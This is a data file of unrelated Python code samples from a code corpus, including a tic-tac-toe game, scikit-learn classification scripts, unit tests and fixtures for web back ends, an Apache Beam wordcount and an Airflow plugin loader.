+{"seq_id":"594988957","text":"\"\"\"Constants for the IPP integration.\"\"\"\n\n# Integration domain\nDOMAIN = \"ipp\"\n\n# Attributes\nATTR_COMMAND_SET = \"command_set\"\nATTR_IDENTIFIERS = \"identifiers\"\nATTR_INFO = \"info\"\nATTR_MANUFACTURER = \"manufacturer\"\nATTR_MARKER_TYPE = \"marker_type\"\nATTR_MARKER_LOW_LEVEL = \"marker_low_level\"\nATTR_MARKER_HIGH_LEVEL = \"marker_high_level\"\nATTR_MODEL = \"model\"\nATTR_SERIAL = \"serial\"\nATTR_SOFTWARE_VERSION = \"sw_version\"\nATTR_STATE_MESSAGE = \"state_message\"\nATTR_STATE_REASON = \"state_reason\"\nATTR_URI_SUPPORTED = \"uri_supported\"\n\n# Config Keys\nCONF_BASE_PATH = \"base_path\"\nCONF_SERIAL = \"serial\"\nCONF_TLS = \"tls\"\nCONF_UUID = \"uuid\"\n","sub_path":"homeassistant/components/ipp/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"473906338","text":"\"\"\"\nCode for creating and saving a movie.\nFrom StackOverflow post: http://stackoverflow.com/questions/4092927/generating-movie-from-python-without-saving-individual-frames-to-files\n\"\"\"\nimport matplotlib.animation as animation\nimport numpy as np\nfrom pylab 
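# --- editor's note (added illustration, not part of the original samples) ---
# get_seq() in the count-and-say record above is run-length encoding; the
# standard library's itertools.groupby expresses the same step compactly:
from itertools import groupby

def look_and_say_step(seq):
    return "".join("{}{}".format(len(list(group)), ch) for ch, group in groupby(seq))

assert look_and_say_step("1211") == "111221"
# --- end note ---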
import *\n\nDPI = 100\n\n\ndef ani_frame():\n fig = plt.figure(tight_layout=True)\n ax = fig.add_subplot(111)\n ax.set_aspect('equal')\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n\n im = ax.imshow(rand(300, 300), cmap='hot', interpolation='nearest')\n im.set_clim([0, 1])\n fig.set_size_inches([5, 5])\n\n def update_img(n):\n tmp = rand(300, 300)\n im.set_data(tmp)\n return im\n\n ani = animation.FuncAnimation(fig, update_img, 300, interval=30)\n writer = animation.writers['ffmpeg'](fps=30)\n\n ani.save('demo.mp4', writer=writer, dpi=DPI)\n return ani\n\n\nif __name__ == '__main__':\n ani_frame()","sub_path":"save_movie.py","file_name":"save_movie.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"80181850","text":"from player import HumanPlayer, ComputerPlayer\nimport time\n\nclass TicTacToe:\n def __init__(self):\n self.board = [\" \" for _ in range(9)]\n self.current_winner = None\n\n def print_board(self):\n for ii in range(3):\n row = self.board[ii*3:(ii+1)*3]\n print('| ' + ' | '.join(row) + ' |')\n\n # for row in [self.board[ii*3:ii+1*3] for ii in range(3)]:\n # print('| ' + ' | '.join(row) + ' |')\n\n @staticmethod\n def print_board_nums():\n board_nums = [[str(jj) for jj in range(kk*3, (kk+1)*3)] for kk in range(3)]\n for row in board_nums:\n print('| ' + ' | '.join(row) + ' |')\n\n def available_moves(self):\n return [idx for idx, space in enumerate(self.board) if space == \" \"]\n\n def empty_squares(self):\n return ' ' in self.board\n\n def winner(self, square, letter):\n # Check row\n row_idx = square // 3\n row = self.board[row_idx*3:(row_idx+1)*3]\n if all([space == letter for space in row]):\n return True\n\n # Check collumn\n col_idx = square % 3\n column = [self.board[col_idx+ii*3] for ii in range(3)]\n if all([space == letter for space in column]):\n return True\n\n # Check diagonals\n diag1 = [self.board[mm] for mm in [0, 4, 8]]\n if all([space == letter for space in diag1]):\n return True\n\n diag2 = [self.board[nn] for nn in [2, 4, 6]]\n if all([space == letter for space in diag2]):\n return True\n\n return False\n\n def make_move(self, spot, letter):\n if self.board[spot] == \" \":\n self.board[spot] = letter\n if self.winner(spot, letter):\n self.current_winner = True\n return True\n return False\n\ndef play(game, x_player, o_player):\n game.print_board_nums()\n letter = 'X'\n\n while game.empty_squares():\n if letter == 'X':\n move = x_player.get_move(game)\n else:\n move = o_player.get_move(game)\n\n if game.make_move(move, letter):\n game.print_board()\n print(f\"{letter} made a move to square {move}\")\n print('\\n')\n\n if game.current_winner:\n print(f\"{letter} wins!\")\n return letter\n\n letter = 'O' if letter == 'X' else 'X'\n time.sleep(1)\n\n print(\"It's a Tie\")\n\n\nif __name__ == '__main__':\n t = TicTacToe()\n x = HumanPlayer('X')\n o = ComputerPlayer('O')\n play(t, x, o)\n\n\n\n\n\n","sub_path":"Tic_Tac_Toe/Trial/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"261984028","text":"import json\nimport unittest\nfrom unittest.mock import patch\n\nfrom sign_up import lambda_handler\n\n\nclass TestSignUPAPI(unittest.TestCase):\n def setUp(self):\n self.event = {\"requestContext\": {\"stage\": \"TEST\"}}\n\n self.signup = {\"path\": \"/signup\",\n \"httpMethod\": \"GET\",\n \"requestContext\":\n 
{\"authorizer\":\n {\"claims\":\n {\"email_verified\": True,\n \"name\": \"Dummy\",\n \"email\": \"dummy@dummy.com\"\n }\n },\n \"accountId\": \"123456\",\n \"requestId\": \"T01\",\n \"requestTimeEpoch\": \"987654321\"\n }\n }\n\n self.delete_user = {\"path\": \"/delete-user\",\n \"httpMethod\": \"GET\",\n \"requestContext\":\n {\"authorizer\":\n {\"claims\":\n {\"email\": \"dummy@dummy.com\"}\n }\n }\n }\n\n self.get_user_profile = {\"path\": \"/profile\",\n \"httpMethod\": \"GET\",\n \"requestContext\":\n {\"authorizer\":\n {\"claims\":\n {\"email\": \"dummy@dummy.com\"}\n }\n }\n }\n\n self.update_user_profile = {\"path\": \"/profile\",\n \"httpMethod\": \"POST\",\n \"body\": '{\"email_alerts\": true, \"is_terms_accepted\": true}',\n \"requestContext\":\n {\"authorizer\":\n {\"claims\":\n {\"email\": \"dummy@dummy.com\"}\n }\n }\n }\n self.get_user_feedback = {\"path\": \"/feedback\",\n \"httpMethod\": \"GET\",\n \"queryStringParameters\": {},\n \"requestContext\":\n {\"authorizer\":\n {\"claims\":\n {\"email\": \"dummy@dummy.com\"}\n }\n }\n }\n self.set_user_feedback = {\"path\": \"/feedback\",\n \"httpMethod\": \"POST\",\n \"body\": '{\"feedback\": {\"org_id\": \"test-snet\", \"service_id\": \"test-service\",'\n ' \"user_rating\": \"4.0\", \"comment\": \"Good Job!\"} }',\n \"requestContext\":\n {\"authorizer\":\n {\"claims\":\n {\"email\": \"dummy@dummy.com\"}\n }\n }\n }\n\n @patch('common.utils.Utils.report_slack')\n def test_request_handler(self, mock_get):\n # event dict is {}\n response = lambda_handler.request_handler(\n event=self.event, context=None)\n assert (response[\"statusCode\"] == 400)\n assert (response[\"body\"] == '\"Bad Request\"')\n\n # event dict has invalid path\n test_event = {\"path\": \"/dummy\", \"httpMethod\": \"GET\"}\n test_event.update(self.event)\n response = lambda_handler.request_handler(\n event=test_event, context=None)\n assert (response[\"statusCode\"] == 404)\n assert (response[\"body\"] == '\"Not Found\"')\n\n @patch('common.utils.Utils.report_slack')\n @patch('sign_up.user.User.fetch_private_key_from_ssm')\n def test_user_signup(self, fetch_private_key_from_ssm_mock, report_slack_mock):\n self.test_del_user_data()\n fetch_private_key_from_ssm_mock.return_value = \"mock_address\"\n report_slack_mock.return_value = \"mock_address\"\n self.signup['requestContext'].update(self.event['requestContext'])\n response = lambda_handler.request_handler(\n event=self.signup, context=None)\n assert (response[\"statusCode\"] == 200)\n response_body = json.loads(response[\"body\"])\n assert (response_body[\"status\"] == \"success\")\n # hit again with same payload\n response = lambda_handler.request_handler(\n event=self.signup, context=None)\n assert (response[\"statusCode\"] == 500)\n response_body = json.loads(response[\"body\"])\n assert (response_body[\"status\"] == \"failed\")\n\n def test_del_user_data(self):\n self.delete_user['requestContext'].update(self.event['requestContext'])\n response = lambda_handler.request_handler(\n event=self.delete_user, context=None)\n assert (response[\"statusCode\"] == 200)\n response_body = json.loads(response[\"body\"])\n assert (response_body[\"status\"] == \"success\")\n\n def test_get_user_profile(self):\n self.get_user_profile['requestContext'].update(\n self.event['requestContext'])\n response = lambda_handler.request_handler(\n event=self.get_user_profile, context=None)\n assert (response[\"statusCode\"] == 200)\n response_body = json.loads(response[\"body\"])\n assert (response_body[\"status\"] == 
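# --- editor's note (added illustration, not part of the original test module) ---
# The stacked @patch decorators used above apply bottom-up, so the patch
# written closest to the test method arrives as the first mock argument
# (here: fetch_private_key_from_ssm_mock before report_slack_mock).
# A self-contained demonstration of that ordering:
from unittest.mock import patch
import os.path

@patch("os.path.exists")   # outer decorator -> second mock argument
@patch("os.path.isfile")   # inner decorator -> first mock argument
def ordering_demo(mock_isfile, mock_exists):
    mock_isfile.return_value = True
    mock_exists.return_value = False
    return os.path.isfile("x"), os.path.exists("x")

assert ordering_demo() == (True, False)
# --- end note ---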
\"success\")\n\n def test_update_user_profile(self):\n self.update_user_profile['requestContext'].update(\n self.event['requestContext'])\n response = lambda_handler.request_handler(\n event=self.update_user_profile, context=None)\n assert (response[\"statusCode\"] == 200)\n response_body = json.loads(response[\"body\"])\n assert (response_body[\"status\"] == \"success\")\n\n def test_get_user_feedback(self):\n self.get_user_feedback['requestContext'].update(\n self.event['requestContext'])\n response = lambda_handler.request_handler(\n event=self.get_user_feedback, context=None)\n assert (response[\"statusCode\"] == 200)\n response_body = json.loads(response[\"body\"])\n assert (response_body[\"status\"] == \"success\")\n\n def test_set_user_feedback(self):\n self.set_user_feedback['requestContext'].update(\n self.event['requestContext'])\n response = lambda_handler.request_handler(\n event=self.set_user_feedback, context=None)\n assert (response[\"statusCode\"] == 200)\n response_body = json.loads(response[\"body\"])\n assert (response_body[\"status\"] == \"success\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_dapp_user.py","file_name":"test_dapp_user.py","file_ext":"py","file_size_in_byte":7076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"355565629","text":"from ctypes import *\nfrom numpy import array\nfrom numpy.ctypeslib import ndpointer\nfrom cfg import ecosystem_path\n\n################################################################################\n# Must have already complied to byte_queue.so; try from src:\n\n# gcc -g -shared -fPIC ../../../c_common/user_lib/src/byte_queue.c -I ../../../c_common/user_lib/inc -o ../obj/_byte_queue.so\n\n################################################################################\n# Configure Low Level Access to C Library\n\nf = ecosystem_path + '/py_common/user_lib/obj/_byte_queue.so'\n\nclib = cdll.LoadLibrary(f);\n\nclass ByteQueueC(Structure):\n _fields_ = [(\"data\", POINTER(c_uint8)),\n (\"start\", POINTER(c_uint8)),\n (\"end\", POINTER(c_uint8)),\n (\"data_size\", c_uint16),\n (\"count\", c_uint16)]\n \n#class ByteQueueC32(Structure):\n# _fields_ = [(\"data\", POINTER(c_uint8)),\n# (\"start\", POINTER(c_uint8)),\n# (\"end\", POINTER(c_uint8)),\n# (\"data_size\", c_uint16),\n# (\"count\", c_uint16),\n# (\"buffer\", c_uint8 * 32)]\n\n_InitBQ = clib.InitBQ\n_InitBQ.argtypes = [POINTER(ByteQueueC), ndpointer(c_uint8), c_uint16] # original\n\n#_InitBQ.argtypes = [POINTER(ByteQueueC), POINTER(c_char*20), c_uint16] # not any better\n#_InitBQ.argtypes = [POINTER(ByteQueueC), POINTER(c_uint8), c_uint16] # not any better\n\n#_InitBQ32 = clib.InitBQ32\n#_InitBQ32.argtypes = [POINTER(ByteQueueC32)]\n\n\n################################################################################\n# Define Convenience Class\n\n#class ByteQueue:\n# def __init__(self, data_size=20):\n# self.bqc = ByteQueueC()\n# self.data = array(size, dtype=c_uint8)\n# _InitBQ(self.bqc, data, data_size)\n","sub_path":"Embedded_cal_test/ecosystem/py_common/user_lib/src/wrapped_libs/byte_queue.py","file_name":"byte_queue.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"36743164","text":"# XXX: can probably get rid of this!\nfrom backpack import monkeypatch\nmonkeypatch()\n\nimport redis\nimport webtest\nimport requests\nimport logging\nimport py.test\nimport tempfile\nimport six\n\nfrom 
peewee import SqliteDatabase\nfrom backpack import Backpack\nfrom backpack.auth import AuthPlugin\nfrom bottlecap.testing import LiveServerThread, DummySMTPServerThread\nfrom requests import Session\n\nif six.PY3: # pragma: nocover\n from urllib.parse import urljoin\nelse: # pragma: nocover\n from urlparse import urljoin\n\n# fix logging\n#logging.basicConfig(level=logging.DEBUG)\n#logger = logging.getLogger('peewee')\n#logger.setLevel(logging.DEBUG)\n#logger.addHandler(logging.StreamHandler())\n\n\nclass LiveServerSession(requests.Session):\n def __init__(self, prefix_url, *args, **kwargs):\n self.prefix_url = prefix_url\n super(LiveServerSession, self).__init__(*args, **kwargs)\n\n def request(self, method, url, *args, **kwargs):\n url = urljoin(self.prefix_url, url)\n return super().request(method, url, *args, **kwargs)\n\n\n@py.test.fixture\ndef database(request):\n tmp = tempfile.NamedTemporaryFile()\n db = SqliteDatabase(tmp.name)\n request.addfinalizer(db.drop_database)\n return db\n\n\nclass CustomStrictRedis(redis.StrictRedis):\n def create_database(self):\n self.flush()\n\n def destroy_database(self):\n self.flush()\n\n\n@py.test.fixture\ndef app(request, database):\n \"\"\"Start live server session and import db fixtures\"\"\"\n app = Backpack(catchall=False)\n app.push_context_manager()\n\n # create smtp server\n smtp_server = DummySMTPServerThread()\n smtp_server.start()\n request.addfinalizer(smtp_server.stop)\n\n # create liveserver\n live_server = LiveServerThread(host='127.0.0.1', port=0, app=app)\n live_server.start()\n request.addfinalizer(live_server.stop)\n app.config['backpack.base_url'] = live_server.url\n app.config['backpack.smtp.host'] = smtp_server.server.hostname\n app.config['backpack.smtp.port'] = smtp_server.server.port\n app.config['backpack.smtp.starttls'] = False\n\n # add auth plugin\n app.config['backpack.auth.jwt_key'] = 'example1'\n app.config['backpack.auth.password_key'] = 'example2'\n app.config['backpack.auth.oath_secret'] = 'example3'\n app.install(AuthPlugin())\n\n # setup databases\n app.databases['default'] = database\n app.databases['rq'] = CustomStrictRedis(db=1)\n app.syncdb()\n\n # setup app\n app.sanity_check()\n app.session = LiveServerSession(prefix_url=live_server.url)\n app.webtest = webtest.TestApp(app)\n app.smtp_server = smtp_server.server\n\n # remove app from context\n request.addfinalizer(app.pop_context_manager)\n request.addfinalizer(app.destroydb)\n return app\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"368276612","text":"import os\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns; sns.set(style=\"ticks\", color_codes=True)\n#import matplotlib.pyplot as plt\n\n\n#from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\n#from sklearn.model_selection import train_test_split\n#from sklearn import linear_model\n#from sklearn.linear_model import LinearRegression\n#from sklearn.model_selection import KFold\n#from sklearn.metrics import mean_squared_error, r2_score\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn import metrics\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import chi2\n\n# set directory\nos.getcwd()\nos.chdir('C:/github/B9DA104/CA2/')\n\n# read file\ndata_set = pd.read_csv('raw-responses-1.csv')\ndata_set = data_set.dropna()\n\n# inspect 
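# --- editor's note (added illustration, not part of the original conftest.py) ---
# LiveServerSession above joins a stored base URL onto every request path by
# overriding requests.Session.request; a standalone Python 3 sketch of the idea:
from urllib.parse import urljoin
import requests

class PrefixedSession(requests.Session):
    def __init__(self, prefix_url):
        super().__init__()
        self.prefix_url = prefix_url

    def request(self, method, url, *args, **kwargs):
        # Relative paths such as "/signup" resolve against the stored base URL.
        return super().request(method, urljoin(self.prefix_url, url), *args, **kwargs)
# --- end note ---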
data\ntype(data_set)\ndata_set.head()\ndata_set.describe()\ndata_set.dtypes\nprint(data_set.shape)\ndata_set.info() #count non-null values in the columns\ndata_set.isnull().sum(axis=0) #count blanks in the columns\n\n# subset with necessary columns only\ncolumns_or = ['q0001','q0002','q0005','q0008_0001','q0008_0002','q0008_0003','q0008_0004','q0008_0005'\n ,'q0008_0006','q0008_0007','q0008_0008','q0008_0009','q0008_0010','q0008_0011','q0008_0012'\n ,'q0017','q0018','q0022','q0024','q0026','age3','q0028','q0029' ]\n\ncolumns_cat = ['q0001_cat','q0002_cat','q0005_cat','q0008_0001_cat','q0008_0002_cat','q0008_0003_cat'\n ,'q0008_0004_cat','q0008_0005_cat','q0008_0006_cat','q0008_0007_cat','q0008_0008_cat'\n ,'q0008_0009_cat','q0008_0010_cat','q0008_0011_cat','q0008_0012_cat','q0017_cat','q0018_cat'\n ,'q0022_cat','q0024_cat','q0026_cat','age3_cat','q0028_cat','q0029_cat']\n\n\ndata_sub = data_set[columns_or]\n\ndata_sub.dtypes\ndata_sub.info() #count non-null values in the columns\ndata_sub.isnull().sum(axis=0) #count blanks in the columns\n\n# categorical encoding (text data into numerical)\nobj_df = data_sub\n\n# change all columns to 'category' type to apply categorical transformation\nfor col in [columns_or]:\n obj_df[col] = obj_df[col].astype('category')\n\n# creating categorical columns based in each df column\nobj_df['q0001_cat'] = obj_df['q0001'].cat.codes\nobj_df['q0002_cat'] = obj_df['q0002'].cat.codes\nobj_df['q0005_cat'] = obj_df['q0005'].cat.codes\nobj_df['q0008_0001_cat'] = obj_df['q0008_0001'].cat.codes\nobj_df['q0008_0002_cat'] = obj_df['q0008_0002'].cat.codes\nobj_df['q0008_0003_cat'] = obj_df['q0008_0003'].cat.codes\nobj_df['q0008_0004_cat'] = obj_df['q0008_0004'].cat.codes\nobj_df['q0008_0005_cat'] = obj_df['q0008_0005'].cat.codes\nobj_df['q0008_0006_cat'] = obj_df['q0008_0006'].cat.codes\nobj_df['q0008_0007_cat'] = obj_df['q0008_0007'].cat.codes\nobj_df['q0008_0008_cat'] = obj_df['q0008_0008'].cat.codes\nobj_df['q0008_0009_cat'] = obj_df['q0008_0009'].cat.codes\nobj_df['q0008_0010_cat'] = obj_df['q0008_0010'].cat.codes\nobj_df['q0008_0011_cat'] = obj_df['q0008_0011'].cat.codes\nobj_df['q0008_0012_cat'] = obj_df['q0008_0012'].cat.codes\nobj_df['q0017_cat'] = obj_df['q0017'].cat.codes\nobj_df['q0018_cat'] = obj_df['q0018'].cat.codes\nobj_df['q0022_cat'] = obj_df['q0022'].cat.codes\nobj_df['q0024_cat'] = obj_df['q0024'].cat.codes\nobj_df['q0026_cat'] = obj_df['q0026'].cat.codes\nobj_df['age3_cat'] = obj_df['age3'].cat.codes\nobj_df['q0028_cat'] = obj_df['q0028'].cat.codes\nobj_df['q0029_cat'] = obj_df['q0029'].cat.codes\n\n# creating new df excluding original columns\ndf_cat = obj_df.drop(['q0001','q0002','q0005','q0008_0001','q0008_0002','q0008_0003','q0008_0004','q0008_0005'\n ,'q0008_0006','q0008_0007','q0008_0008','q0008_0009','q0008_0010','q0008_0011','q0008_0012'\n ,'q0017','q0018','q0022','q0024','q0026','age3','q0028','q0029'], axis=1)\n\n\n# Gaussian Naive Bayes Classification\n\n# creating 'x' and 'y' objects to be used into the Multiple Linear Regression\nx = pd.DataFrame(df_cat, columns=['q0002_cat','q0005_cat','q0008_0001_cat','q0008_0002_cat','q0008_0003_cat'\n ,'q0008_0004_cat','q0008_0005_cat','q0008_0006_cat','q0008_0007_cat','q0008_0008_cat'\n ,'q0008_0009_cat','q0008_0010_cat','q0008_0011_cat','q0008_0012_cat','q0017_cat','q0018_cat'\n ,'q0022_cat','q0024_cat','q0026_cat','age3_cat','q0028_cat','q0029_cat'])\n\ny = pd.DataFrame(df_cat, columns=['q0001_cat'])\n\n# feature extraction\nnp.set_printoptions(suppress=True)\n\ntest = SelectKBest(score_func=chi2, 
k=3)\nfit = test.fit(x, y)\n# summarize scores\nnp.set_printoptions(precision=3)\nprint(fit.scores_)\n\n# recreating x with better scored features\nx = pd.DataFrame(df_cat, columns=['q0008_0001_cat','q0029_cat','q0008_0006_cat','q0022_cat','q0008_0009_cat'\n                                  ,'q0026_cat','q0017_cat','q0008_0002_cat','q0008_0004_cat','q0008_0003_cat'\n                                  ,'q0008_0007_cat','q0008_0008_cat','q0005_cat','q0002_cat','q0018_cat'])\n\n# splitting database\nk2 = int(len(df_cat['q0001_cat']) * 0.2) # 20% samples\n\n\nx_train = x[k2:] #80%\nx_train = np.c_[np.ones(len(x_train),dtype='int64'),x_train]\ny_train = y[k2:]\n\nx_test = x[:k2] #20%\nx_test = np.c_[np.ones(len(x_test),dtype='int64'),x_test]\ny_test = y[:k2]\ny_test = y_test.round(0)\n\n# train the model\nclf = GaussianNB()\nclf.fit(x_train, y_train)\n\n# use the model to predict the labels of the test data\npredicted = clf.predict(x_test)\nexpected = y_test\n\nprint(predicted) \nprint(expected) \n\n\npredicted_df = pd.DataFrame({'q0001_cat':predicted})\n\npredicted_m = predicted_df.values\nexpected_m = expected.values\n\n# check performance \nmatches = (predicted_m == expected_m)\ncorrect = (matches.sum() / float(len(matches)))*100\nprint('Predictions match (%): ',correct.round(2))\n\nprint(metrics.confusion_matrix(expected_m, predicted_m))\n\n","sub_path":"CA2/MasculinitySurvey/CA2_CM_v1.py","file_name":"CA2_CM_v1.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"123338272","text":"'''Write code to create a list of word lengths for the words in original_str using the accumulation pattern \nand assign the answer to a variable num_words_list. (You should use the len function).'''\n\noriginal_str = \"The quick brown rhino jumped over the extremely lazy fox\"\n\nsplit_string = original_str.split()\n\ncount = 0\nfor word in split_string:\n    split_string[count] = len(word)\n    count += 1\n    \nnum_words_list = split_string\nprint(num_words_list)","sub_path":"Chapter_7/ex_7_18.py","file_name":"ex_7_18.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"646318025","text":"#!/usr/bin/env python2.7\n\nimport numpy as np\nimport sys\nimport skflow\nfrom sklearn import linear_model, svm, tree, neighbors\nfrom sklearn.neighbors.nearest_centroid import NearestCentroid\nfrom sklearn.linear_model import *\nfrom sklearn.ensemble import *\nfrom sklearn.dummy import *\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.preprocessing import *\nfrom sklearn.gaussian_process import GaussianProcessClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.decomposition import PCA\nfrom sklearn.pipeline import Pipeline\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import GridSearchCV, cross_val_score\n\n\n#print_all = True\nprint_all = False\n\nprinted_already = {}\nprinted_already_rr = {}\n\npolynomial = False\npolynomial_number = 3\n\ndef to_new_sample(data, printy):\n    LOC = data[0]\n    RR = data[1]\n    l3_hit = data[2]\n    l3_miss = data[3]\n    local_dram = data[4]\n    remote_dram = data[5]\n    l2_miss = data[6]\n    uops_retired = data[7]\n    unhalted_cycles = data[8]\n    remote_fwd = data[9]\n    remote_hitm = data[10]\n    instructions = data[11]\n    context_switches = data[12]\n    bw1 = data[13]\n    bw2 = data[14]\n    bw3 = data[15]\n    bw4 = data[16]\n    number_of_threads = data[17]\n\n    intra_socket = 
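# --- editor's note (added illustration, not part of the original script) ---
# Above, the chi2 scores are printed and the best-scoring columns are then
# retyped by hand; SelectKBest can report its chosen columns directly through
# get_support(), which avoids transcription slips:
import pandas as pd
from sklearn.feature_selection import SelectKBest, chi2

def top_k_columns(features, target, k):
    selector = SelectKBest(score_func=chi2, k=k).fit(features, target)
    return list(features.columns[selector.get_support()])
# --- end note ---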
l2_miss - (l3_hit + l3_miss)\n inter_socket = remote_fwd + remote_hitm\n bw = bw1 + bw2 + bw3 + bw4\n local_accesses = 0\n if local_dram > 0 or remote_dram > 0:\n local_accesses = local_dram / (1 + local_dram + float(remote_dram))\n\n normalized = 18 * [0.]\n normalized[0] = LOC\n normalized[1] = RR\n for i in range(2, 12):\n normalized[i] = (float(data[i]) / float(2 * 1000 * 1000 * 1000)) / float(number_of_threads)\n\n for i in range(12, 16):\n normalized[i] = float(data[i]) / float(number_of_threads)\n\n normalized[17] = data[17]\n\n llc_hitrate = l3_hit / float(l3_hit + l3_miss)\n new_data = np.array([LOC, RR, intra_socket / float(uops_retired), inter_socket / float(uops_retired), local_dram / float(uops_retired), remote_dram / float(uops_retired),\n local_dram / float(1 + local_dram + remote_dram), float(remote_fwd + remote_hitm) / float(uops_retired), \n instructions / float(unhalted_cycles), uops_retired / float(instructions), l3_hit / float(uops_retired), l3_miss / float(uops_retired),\n l3_hit / (l3_hit + float(l3_miss)), float(uops_retired) / float(unhalted_cycles), number_of_threads])\n\n new_data = np.array([LOC, RR, intra_socket / float(uops_retired), inter_socket / float(uops_retired),\n uops_retired / float(unhalted_cycles), number_of_threads,\n l3_hit / (l3_hit + float(l3_miss)), l3_miss / float(uops_retired), (local_dram + remote_dram) / float(uops_retired),\n 4 * bw if RR else bw, instructions / float(uops_retired) ])\n \n if printy:\n if LOC == 1:\n if number_of_threads in printed_already:\n if printed_already[number_of_threads] == 2 and not print_all:\n return new_data\n elif printed_already[number_of_threads] == 1:\n printed_already[number_of_threads] = printed_already[number_of_threads] + 1\n else:\n printed_already[number_of_threads] = 1\n\n print(\"LOC\")\n else:\n if number_of_threads in printed_already_rr:\n if printed_already_rr[number_of_threads] == 2 and not print_all:\n return new_data\n elif printed_already_rr[number_of_threads] == 1:\n printed_already_rr[number_of_threads] = printed_already_rr[number_of_threads] + 1\n else:\n printed_already_rr[number_of_threads] = 1\n\n print(\"RR\")\n \n # print(\"number of threads: \" + str(number_of_threads))\n # print(\"llc hit rate: \" + str(llc_hitrate))\n # print(\"intra_socket: \" + str(intra_socket / float(uops_retired)))\n # print(\"inter_socket: \" + str(inter_socket / float(uops_retired)))\n # print(\"local: \" + str(local_dram / float(uops_retired)))\n # print(\"remote: \" + str(remote_dram / float(uops_retired)))\n # print(\"bw: \" + str((bw) / float(unhalted_cycles) ))\n print(\"number ol threads: \" + str(number_of_threads))\n print(\"llc hit rate: \" + str(llc_hitrate))\n print(\"intra socket: \" + str(intra_socket / float(uops_retired)))\n print(\"inter socket: \" + str(inter_socket / float(uops_retired)))\n print(\"uops retired per cycle: \" + str(uops_retired / float(unhalted_cycles)))\n print(\"llcc miss per uops retired: \" + str(l3_miss / float(uops_retired)))\n print(\"bw1, bw2, bw3, bw4: \" + str(bw1) + \" \" + str(bw2) + \" \" + str(bw3) + \" \" + str(bw4))\n print(\"(local + remote dram): \" + str((local_dram + remote_dram) / float(uops_retired)))\n #print(\"bw: \" +str((bw) / float(unhalted_cycles) ))\n\n \n print(new_data)\n print(data)\n print(\"------\")\n\n #return new_data\n return data\n\n\ndef transform(all_data, printy):\n\n new_all_data = to_new_sample(all_data[0], printy)\n\n for i in range(1, all_data.shape[0]):\n data = all_data[i]\n new_data = to_new_sample(data, printy)\n 
new_all_data = np.vstack((new_all_data, new_data))\n\n return new_all_data\n\n\n\n\nactual_train_data=[]\nlabels=[]\n\ntrain_data = np.loadtxt(sys.argv[1], delimiter=',')\n(rows, cols) = train_data.shape\nlabels = train_data[:, cols - 1]\n\ndef classify(classifier_name, trained_classifier, test_filenames):\n print(\"============================================\")\n print(classifier_name)\n print(\"============================================\")\n\n # parameters = {'n_estimators':[5, 10, 20, 30, 40, 50, 100], 'criterion':('gini', 'entropy'), 'min_samples_split':[0.1, 0.2, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9],\n # 'min_samples_leaf':[0.01, 0.1, 0.2, 0.4]}\n # clf = GridSearchCV(trained_classifier, parameters)\n # clf.fit(actual_train_data, labels)\n # print(clf.best_params_)\n\n scores = cross_val_score(trained_classifier, actual_train_data, labels, cv=10)\n print(\"Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\n\n for fn in test_filenames:\n print(\">>> (\" + fn + \")\")\n test_data = np.loadtxt(fn, delimiter=',')\n test_data = test_data[:, 0:(cols - 1)]\n test_data = transform(test_data, False)\n #test_data = preprocessing.normalize(test_data, norm='l2')\n\n\n #print(\"actual test data: \" + str(test_data))\n if polynomial:\n poly = PolynomialFeatures(polynomial_number)\n test_data = poly.fit_transform(test_data)\n\n print(trained_classifier.predict(test_data))\n print(trained_classifier.predict_proba(test_data))\n ones = len(np.where((trained_classifier.predict(test_data) == 1))[0])\n zeros = len(np.where((trained_classifier.predict(test_data) == 0))[0])\n print(\"Result: \" + str(ones) + \"/\" + str(zeros))\n print(np.where((trained_classifier.predict(test_data) == labels) == False))\n\n \n print(\"============================================\")\n\n\ntest_filenames = []\nfor i in range(2, len(sys.argv)):\n test_filenames.append(sys.argv[i])\n\n\nactual_train_data = train_data[:, 0:cols - 1]\nprint(\"SHAPE of actual: \" + str(actual_train_data.shape))\n#print(\"SHAPE of actual: \" + str(transform(train_data[:, 0:cols - 1], False).shape))\n#print(transform(train_data[:, 0:cols - 1], False))\n\n\npipeline = Pipeline([('scaling', StandardScaler()), ('pca', PCA(n_components=3))])\n\nactual_train_data = transform(train_data[:, 0:cols - 1], False)\n#actual_train_data = preprocessing.normalize(actual_train_data, norm='l2')\n\n#print(\"actual train data: \" + str(actual_train_data[0]))\n\nif polynomial:\n poly = PolynomialFeatures(polynomial_number)\n actual_train_data = poly.fit_transform(actual_train_data)\n\nprint(\"----- About to have a look at test_data -----\")\n\n\n#print(pipeline.fit_transform(train_data[:, 0:cols - 1]))\n#print(pipeline.fit_transform(test_data))\n\n#test_data = 